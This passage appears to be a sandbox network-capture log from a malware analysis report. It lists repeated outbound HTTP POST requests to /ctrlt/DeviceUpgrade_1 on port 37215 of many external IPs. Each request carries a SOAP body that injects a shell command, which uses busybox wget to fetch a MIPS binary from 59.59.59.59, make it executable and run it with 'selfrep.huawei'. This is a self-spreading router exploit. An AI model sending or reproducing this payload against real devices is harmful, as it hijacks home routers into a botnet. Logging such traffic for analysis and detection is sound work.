                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          280192.168.2.1545686197.104.52.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533370972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          281192.168.2.1541690157.92.26.20037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533406019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          282192.168.2.1559362197.216.157.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533444881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          283192.168.2.1555122157.110.17.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533471107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          284192.168.2.154714689.17.156.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533504963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          285192.168.2.153511641.32.44.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533529043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          286192.168.2.1553036192.158.233.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533670902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          287192.168.2.154042841.137.213.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533698082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          288192.168.2.153763841.75.151.11137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533713102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          289192.168.2.153428841.3.22.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.533727884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 